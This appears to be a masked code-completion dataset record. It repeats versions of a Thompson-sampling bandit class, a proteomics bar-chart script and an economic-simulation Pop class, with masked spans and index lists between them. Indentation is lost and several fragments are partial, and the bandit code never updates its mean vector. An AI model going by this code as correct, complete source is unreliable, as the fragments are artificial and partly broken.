for i in np.arange(0, self.d):
self.q[i] += sum(self.batch_articles[i] * self.
batch_articles[i] * p[i] * (1 - p[i]))
self.batch_ids = list([])
self.batch_clicks = np.array([])
<mask token>
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
<mask token>
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
self.batch_articles = self.articles_1_d[self.batch_ids].reshape([
self.d, self.batch_size])
res = minimize(self.to_minimize, w, method='nelder-mead',
options={'xtol': 1e-08, 'disp': False})
self.m = res.x
p = 1 / (1 + np.exp(-self.m.dot(self.batch_articles)))
for i in np.arange(0, self.d):
self.q[i] += sum(self.batch_articles[i] * self.
batch_articles[i] * p[i] * (1 - p[i]))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
def sigmoid(self, x):
return 1.0 / (1.0 + math.exp(-x))
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
self.batch_articles = self.articles_1_d[self.batch_ids].reshape([
self.d, self.batch_size])
res = minimize(self.to_minimize, w, method='nelder-mead',
options={'xtol': 1e-08, 'disp': False})
self.m = res.x
p = 1 / (1 + np.exp(-self.m.dot(self.batch_articles)))
for i in np.arange(0, self.d):
self.q[i] += sum(self.batch_articles[i] * self.
batch_articles[i] * p[i] * (1 - p[i]))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| import numpy as np
import math
import random
from numpy.linalg import inv
from scipy.optimize import minimize
from Util import to_vector
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
def sigmoid(self, x):
# print(x)
return 1.0 / (1.0 + math.exp(-x))
def add_new_article(self, line):
article_id = int(line.split(" ")[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1/2 * sum (self.q * (w - self.mu) * (w - self.mu)) + sum(np.log(1+np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
self.batch_articles = self.articles_1_d[self.batch_ids].reshape([self.d, self.batch_size])
res = minimize(self.to_minimize, w, method='nelder-mead', options={'xtol': 1e-8, 'disp': False})
self.m = res.x
p = 1/(1 + np.exp(- self.m.dot(self.batch_articles)))
for i in np.arange(0, self.d):
self.q[i] += sum(self.batch_articles[i] * self.batch_articles[i] * p[i] * (1-p[i]))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions, click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1/self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1 :
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles)-1)
selected_article = best_value_articles[index]
return selected_article, warmup
| [
1,
6,
7,
8,
10
] |
660 | e08159a51b611ce6d0ca354a4fe6759d00af2cb7 | <mask token>
| <mask token>
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| <mask token>
file_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',
'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']
file_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| import matplotlib.pyplot as plt
file_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',
'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']
file_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| import matplotlib.pyplot as plt
file_list = ["Quantification_comet_fdr.csv",
"Quantification_crux_fdr.csv",
"Quantification_msfg_fdr.csv",
"Quantification_msfg_percolator.csv"]
file_titles = ["Comet",
"Crux",
"MSGFPlus",
"MSGFPlus + Percolator"]
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0 # n of proteins
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3: # Proteins are listed after row 4
proteins += 1
peptides += int(line.split('\t')[3]) # n_peptides is in column 4
protein_list.append(proteins)
peptides_list.append(peptides)
print(f"{file_name} is done")
plt.bar(file_titles,
protein_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing proteins found")
plt.ylabel("Number of proteins matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_proteins.png")
plt.bar(file_titles,
peptides_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing amount of peptides matched")
plt.ylabel("Total amount of peptides matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_peptides.png")
| [
0,
1,
2,
3,
4
] |
661 | 887a39f1eeb81e6472938c2451e57866d3ac4a45 | <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
<mask token>
<mask token>
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
<mask token>
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
<mask token>
<mask token>
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
<mask token>
<mask token>
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
<mask token>
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
<mask token>
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
<mask token>
<mask token>
<mask token>
def __key__(self):
return self.id
<mask token>
<mask token>
| <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
<mask token>
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
Find a province near home province where its the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
<mask token>
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
<mask token>
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
Find a province near home province where its the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
def update_price_model(self, good, order_type, is_successful,
clearing_price=0):
"""
Update the Pop's price model for the given resource
good (Good) The Good which was orderd
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1
HIGH_INVENTORY = 2.0
MIN_PRICE = 0.01
if is_successful:
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05
delta_to_mean = mean - public_mean_price
if is_successful:
if (order_type is OrderType.buy_order and delta_to_mean >
SIGNIFICANT):
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low += wobble * mean
belief.high -= wobble * mean
else:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
if (order_type is OrderType.buy_order and stocks <
LOW_INVENTORY * ideal):
wobble *= 2
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if (supply_vs_demand > SIG_IMBALANCE or
supply_vs_demand < -SIG_IMBALANCE):
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low -= wobble * mean
belief.high += wobble * mean
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
<mask token>
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
